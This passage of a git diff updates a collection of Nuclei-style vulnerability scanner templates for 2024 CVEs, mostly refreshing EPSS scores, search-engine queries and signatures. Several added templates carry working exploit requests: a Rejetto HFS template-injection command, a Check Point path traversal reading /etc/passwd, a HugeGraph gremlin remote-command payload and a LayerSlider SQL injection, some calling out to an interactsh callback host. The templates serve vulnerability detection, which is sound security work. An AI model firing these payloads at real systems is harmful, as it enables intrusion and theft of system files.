odm" tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce http: @@ -46,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100bb5445a0a7a75731a60c4f541edc93846d4b21a800881005eb87588c9efe49a5022100c19eb39aff09e8bb429bb5c62816d7c8c8f6aff8bf92d80e455c4e9d0591e021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e4a4d30e6df6808d0ce17438a6f11b8c61b769082b39c9bacf8f08ef85f53a402201b25e55f56c429758e34758316d597f7c019ee6fbec6b0b8e127886e429fd275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index e0131eacea..00179862c4 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -18,13 +18,14 @@ info: cvss-score: 6.1 cve-id: CVE-2024-22927 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26844 + epss-score: 0.10809 + epss-percentile: 0.95082 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: eyoucms product: eyoucms - fofa-query: title="eyoucms" + fofa-query: "title=\"eyoucms\"" tags: cve2024,cve,eyoucms,cms,xss http: @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d56c054dfa9f7fe7f6545e75fa158ccb1087a39f04e8788c87fda5a82d08bde2022017e4ffcc92a50b5af00e21322b670730737c9d8c775183d4b69e7ea4d2ed381e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 7d39720ff7..66df150960 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-2340 - epss-score: 0.00043 - epss-percentile: 0.08267 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ce1ac8b2838d3f39573c0dad38b90d092fc30429472656baf03db2659983c79022050f63a92a5a33033e109adbb6e973ac87138adb868fa226c73e064fb461a5424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-23692.yaml b/http/cves/2024/CVE-2024-23692.yaml new file mode 100644 index 0000000000..0065592c49 --- /dev/null +++ b/http/cves/2024/CVE-2024-23692.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-23692 + +info: + name: Rejetto HTTP File Server - Template injection + author: johnk3r + severity: critical + description: | + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-23692 + cwe-id: CWE-1336 + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rejetto,rce + +http: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "rejetto" +# digest: 4b0a00483046022100b9a14758a1d4c7e1141e672f3b672defcadb9519c76b6097f97447664b207dd9022100a289dba646ba9b3f9b044ec5a7c73804d94b8b4c5ff776df5650975fbbe80a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 1a387b8796..d63f57692f 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -14,16 +14,20 @@ info: cvss-score: 9.8 cve-id: CVE-2024-23917 cwe-id: CWE-306,CWE-288 - epss-score: 0.00091 - epss-percentile: 0.38219 + epss-score: 0.04384 + epss-percentile: 0.92363 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: jetbrains product: teamcity - tags: cve,cve2024,auth-bypass,teamcity - + shodan-query: + - "http.title:teamcity" + - http.component:"teamcity" + fofa-query: "title=teamcity" + google-query: "intitle:teamcity" + tags: cve,cve2024,auth-bypass,teamcity,jetbrains flow: http(1) && http(2) http: @@ -69,4 +73,4 @@ http: - "contains(content_type,'application/xml')" - "contains(body,'<projects href=')" condition: and -# digest: 4b0a00483046022100f2ab25f2474d2b66f27eac34cf59dd749516c75af1ec18933a8a2040ed0661a2022100b5fe19d35dcd8e849f3543cdde3db3a38866b8f64bf3c216f156ec0daabf27c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220148e3d60d45a7598faca5ac1e4372beb469bb5270575a9ba24836b84e7efeb21022100ddaf2714ec4ab4c387e2b72f8cbf8380913ae7440af993a425a2347acb1f0b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 9cab50258d..1e44d3388d 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -20,9 +20,13 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"SuperWebMailer" vendor: superwebmailer product: superwebmailer + shodan-query: + - title:"SuperWebMailer" + - http.title:"superwebmailer" + fofa-query: title="superwebmailer" + google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss http: @@ -47,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220032d4b97b591843081cb56c3a14d32090188597aa26e4f4db65465e16de4ee4e02205e181868582419cc3fcb00ffae21c2d1a96c3d5604d6053e235459942752d31d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml new file mode 100644 index 0000000000..9827767cec --- /dev/null +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-24919 + +info: + name: Check Point Quantum Gateway - Information Disclosure + author: johnk3r + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + reference: + - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ + - https://support.checkpoint.com/results/sk/sk182337 + metadata: + verified: true + max-request: 1 + vendor: checkpoint + product: quantum_security_gateway + shodan-query: + - html:"Check Point SSL Network" + - http.html:"check point ssl network" + fofa-query: body="check point ssl network" + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + tags: cve,cve2024,checkpoint,lfi + +http: + - raw: + - | + POST /clients/MyCRL HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + + aCSHELL/../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*" + - "nobody:.*" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450221009afc265207776c9f9b1141fe6d3ee1d95636a46c187f30031ad4d91454e24c80022074c76d77fa0af466c7c78777681ecec941e3bd46946c9604f7e24a476aa1617e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml index 84ee144ab5..512b9aabb3 100644 --- a/http/cves/2024/CVE-2024-25669.yaml +++ b/http/cves/2024/CVE-2024-25669.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: a360inc product: caseaware - fofa-query: title="CaseAware" + fofa-query: + - title="CaseAware" + - title="caseaware" tags: cve,cve2024,xss,caseaware,a360inc http: @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204fd5e74ee54c20db7c3cd5d1790ab78c384eddacdb1bf6ab4888e62b47bb923202202cd297fb7131e47bfcbdfb0b0fecfb9e7389b820ed1ade4c78b2789b4750b18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6a58d9146204ae0ffb0ab57b75f31c8cc8a2904197b3012eea9461123594e2c02200233a9dfb0f2290cadf406d7908d4f86522a9344cf74429dfbab394d62a05d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 198d9060bc..740ccf33a6 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -9,12 +9,20 @@ info: reference: - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt - https://packetstormsecurity.com/files/cve/CVE-2024-25735 + - http://packetstormsecurity.com/files/177082 + - https://hyp3rlinx.altervista.org + - https://github.com/codeb0ss/CVE-2024-25735-PoC + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 vendor: wyrestorm product: apollo vx20 - shodan-query: ssl:"WyreStorm Apollo VX20" + shodan-query: + - ssl:"WyreStorm Apollo VX20" + - ssl:"wyrestorm apollo vx20" tags: packetstorm,cve,cve2024,wyrestorm,info-leak http: @@ -38,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089ae34c1356c7a3fcbe4fd3f863ccf350a6212f8f027d22935fd77435e6f3cb002201dbc01d34ec78fdc6c513b82ba17a53b6508a1d3e3bf07cd4c8e6d4989454a5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index a2b5dd920f..24940ac680 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -1,19 +1,25 @@ id: CVE-2024-26331 -info: - name: ReCrystallize Server - Authentication Bypass - author: Carson Chan - severity: high - description: | - This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. - reference: - - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - metadata: - verified: true - max-request: 1 - shodan-query: title:"ReCrystallize" - tags: cve,cve02024,recrystallize,auth-bypass - +info: + name: ReCrystallize Server - Authentication Bypass + author: Carson Chan + severity: high + description: | + This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. + reference: + - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm + - https://github.com/Ostorlab/KEV + classification: + epss-score: 0.00053 + epss-percentile: 0.21091 + metadata: + verified: true + max-request: 1 + shodan-query: title:"ReCrystallize" + tags: cve,recrystallize,auth-bypass,cve2024 + http: - method: GET path: @@ -34,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080910a3943e4988be013115a405cba6b2a3ebe196ba7484f7880a73f52e5134f02201aecddd5947b597c5263b214739ac08884025c217e2c5460e5e8f56cd60e5c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ddc2fba9fc4b4c139630136f53ceb821c4a827a26c4cb8c3d0e265aa4623a89c022100cdf4351140e2e01daa44e99fd95c6da5b9a9769e50ef01bc57de9712f58434a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index fc07165948..3d96ee8a18 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -25,7 +25,12 @@ info: max-request: 1 vendor: jetbrains product: teamcity - shodan-query: http.component:"TeamCity" + shodan-query: + - http.component:"TeamCity" + - http.title:teamcity + - http.component:"teamcity" + fofa-query: title=teamcity + google-query: intitle:teamcity tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev http: @@ -40,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "buildNumber", "server version", "internalId")' condition: and -# digest: 490a0046304402202c6f5201162870b8740cba1e24a1a2c07ffbfaffd2ec2014089965be490e0160022058c8821bc89e13c81538085bf8725658320ee8ccebb2ecade3d9755cd2a79e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0849961f44a2fee3b59f3c520432b723a00791dc5d185d1f038e82d19c43f0a02201394347c9b846db379a0bd5082e2e1a6527d4ecec7b55841322f69307cd641ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml new file mode 100644 index 0000000000..6aee1c8210 --- /dev/null +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-27348 + +info: + name: Apache HugeGraph-Server - Remote Command Execution + author: DhiyaneshDK + severity: high + description: | + Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component. + reference: + - http://www.openwall.com/lists/oss-security/2024/04/22/3 + - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication + - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 + - https://github.com/Zeyad-Azima/CVE-2024-27348 + - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348 + - https://nvd.nist.gov/vuln/detail/CVE-2024-27348 + classification: + cve-id: CVE-2024-27348 + cwe-id: CWE-77 + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + shodan-query: title:"HugeGraph" + fofa-query: title="HugeGraph" + tags: cve,cve2024,hugegraph,rce,apache + +http: + - raw: + - | + POST /gremlin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} + + matchers: + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(header, "application/json")' + - 'contains(body, "inputStream\":")' + condition: and +# digest: 4a0a00473045022100aa9ae92d5900b75820e9ffcd29849fac5041ac03f2ae87c595cd533beb114ca002206bb3b4a4720b2ec86023bcbef0e2274fc1fb729953519ccad6dded1328e88770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27497.yaml b/http/cves/2024/CVE-2024-27497.yaml index 4ea28ef36c..30e4387be9 100644 --- a/http/cves/2024/CVE-2024-27497.yaml +++ b/http/cves/2024/CVE-2024-27497.yaml @@ -17,7 +17,7 @@ info: - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00053 - epss-percentile: 0.19682 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d648ce17e1aa4e428a0b0e1e97efcc77a38d967b78bb04310f2fe738453b8bf8022100c19b01d2806b0f6b8a012dabc56b3481e922186c96e66065dd43882342386a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc45a3642ab4b42420d1363596d33f08fb8092e527d7bafbe36f1d860115fe6b022100bf43e1c1bd2ccdaa945c05099e77a2b9b4c3a24f6ecafba7aecfbaed81b6e3e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 5c084baf08..df793f0dbb 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -11,8 +11,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 metadata: verified: true - max-request: 1 - fofa-query: title="ChatGPT个人专用版" + max-request: 2 + fofa-query: "title=\"ChatGPT个人专用版\"" tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi http: @@ -38,4 +38,4 @@ http: - contains(header, "image/jpeg") - status_code == 200 condition: and -# digest: 4a0a00473045022100b9b55cd78c5bb4e24de24aca20920e6ba2c0d52798af31282704de45a856095602206312e280926ef5b729c9178e0324d61a55b67c1ab2fb12752b2f46b3ac3dea97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 3c5c29ab95..bf14bf8963 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.9 cve-id: CVE-2024-27956 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.08203 + epss-score: 0.0005 + epss-percentile: 0.1901 metadata: verified: true max-request: 1 @@ -45,4 +45,4 @@ http: - 'contains(header, "application/csv")' - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and -# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059d16ddd969cd0cc9c7c05d5ca2d66a1a4e5631bacd4815549a048eee5cf121702206ea54044b56d493bf48811a0def2447e3780f5783796e6a33becfcb9a2bd9d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml index 8ce2c581ea..646126ef44 100644 --- a/http/cves/2024/CVE-2024-28255.yaml +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -11,19 +11,19 @@ info: - https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 - https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 - https://nvd.nist.gov/vuln/detail/CVE-2024-28255 + - https://github.com/wy876/wiki classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-28255 cwe-id: CWE-287 - epss-score: 0.00045 - epss-percentile: 0.12989 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:733091897 tags: cve,cve2024,openmetadata,rce,auth-bypass - variables: callback: "{{interactsh-url}}" cmd: "nslookup {{callback}}" @@ -43,4 +43,4 @@ http: - 'contains(body, "java.lang.Boolean")' - 'contains(header, "application/json")' condition: and -# digest: 4a0a00473045022100c0396d7d2cda35db57fec494cace654bac870c3441e8062bf8d202f35ccbf1e9022005757044cea4c00fe5c637c2d8134c5542795f4f41eeb6abd464db998a20471a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba11d3498335ba1095da089f921bbe787ab7593a167794e6a318a940266c1852022100d866d668b6450e6b6a42dc1647a952564100f36d7e7cb5e1092d2070312ec863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index d7cb5481c3..9c9ae66d4e 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -16,7 +16,7 @@ info: epss-percentile: 0.12994 metadata: max-request: 1 - tags: cve,cve2024,coda,xss + tags: packetstorm,cve,cve2024,coda,xss http: - raw: @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220639152ac7101721af13e0f678be3f3ff7cf9b440afa2e13e5691cc2c62e3ccdf02207da7b95d3c2610f4b7d80e42eb444efd95d5f30f992d0335dfac80d9f72719c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201aaadc24cf45d9dfb1bf02a74d4c050dee86630aec998cf9fecb300af3c80b81022100a732dbb88437b2e94b89d4ad56fe2bbe5ce339d77a292639376b049919c7e896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 27dc05462e..05ffbf675b 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -3,7 +3,7 @@ id: CVE-2024-2879 info: name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection author: d4ly - severity: critical + severity: high description: | The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 7.10.1 @@ -14,18 +14,21 @@ info: - https://layerslider.com/release-log/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2024-2879 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.07687 + epss-score: 0.00492 + epss-percentile: 0.76133 + cpe: cpe:2.3:a:layerslider:layerslider:7.9.11:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 + vendor: layerslider + product: layerslider + framework: wordpress publicwww-query: "/wp-content/plugins/LayerSlider/" tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli - flow: http(1) && http(2) http: @@ -42,7 +45,7 @@ http: - raw: - | @timeout: 10s - GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1' + GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1 Host: {{Hostname}} matchers: @@ -52,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 490a00463044022018e9ab68758dc46b0e8fa4a2f179139d263576514965c9076f0c2900381f4ef802203e45ad59adc22e90a0a05978f10e22f9158338cd41c4d07900229bb50ff24dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d08df52fd34a2899c7ad336122c98cb8a653f7b46dc73ca7520b4da782b28450221008fde2dd001e36505866de89454fb87ee47618f6289b7fa30f30abf8c45a71bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 359178ba06..02bf62546f 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -9,18 +9,23 @@ info: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059 - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/ - https://github.com/codewhitesec/HttpRemotingObjRefLeak + - https://github.com/NaInSec/CVE-LIST + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-29059 - epss-score: 0.00043 - epss-percentile: 0.07503 + cwe-id: CWE-209 + epss-score: 0.01259 + epss-percentile: 0.85581 cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: 'Server: MS .NET Remoting' vendor: microsoft product: .net_framework + shodan-query: + - 'Server: MS .NET Remoting' + - "server: ms .net remoting" tags: cve,cve2024,dotnet,microsoft,remoting,deserialization http: @@ -75,4 +80,4 @@ http: - "contains(body_1,'ObjRef')" - "contains(x_vuln_test,'{{randstr}}')" condition: and -# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220345063f60a2d0c6207c121752f7cb77e3dcbed7838778fba2d50401c0157e8b3022100c4030d56682e9556b292d09469ecf21d4119b2f3b7dd00ad8d5ee7c70a1c1f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 50f03735cc..7b7d08c32b 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -9,10 +9,15 @@ info: reference: - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b + - https://github.com/Ostorlab/KEV + - https://github.com/YongYe-Security/CVE-2024-29269 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-29269 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: max-request: 1 shodan-query: title:"Login to TLR-2005KSH" @@ -43,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202588a25e1042a61777bdb84f557b67a9f93b51713a37c41b28d81bbedf12324b022100c4770f328e89c8c133189d9c7d74131d77f77ea05e218d41dd03e4917674b2ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b5117d474664154b7b9b2b8f2c14284599c81fcbe172df27d9793b3b4a8d65602206c4b5689c81e4a2e53e1e5917aa6e6dd97595c1d5a8c1313772ee7aea8d2473d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index 4c3d3c3a57..f0a367cfae 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -16,15 +16,20 @@ info: cvss-score: 5.3 cve-id: CVE-2024-3097 cwe-id: CWE-862 - epss-score: 0.00052 - epss-percentile: 0.19521 + epss-score: 0.04672 + epss-percentile: 0.92605 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: imagely - product: nextgen_gallery + product: "nextgen_gallery" framework: wordpress + shodan-query: + - "cpe:\"cpe:2.3:a:imagely:nextgen_gallery\"" + - http.html:/wp-content/plugins/nextgen-gallery/ + fofa-query: "body=/wp-content/plugins/nextgen-gallery/" publicwww-query: "/wp-content/plugins/nextgen-gallery/" - 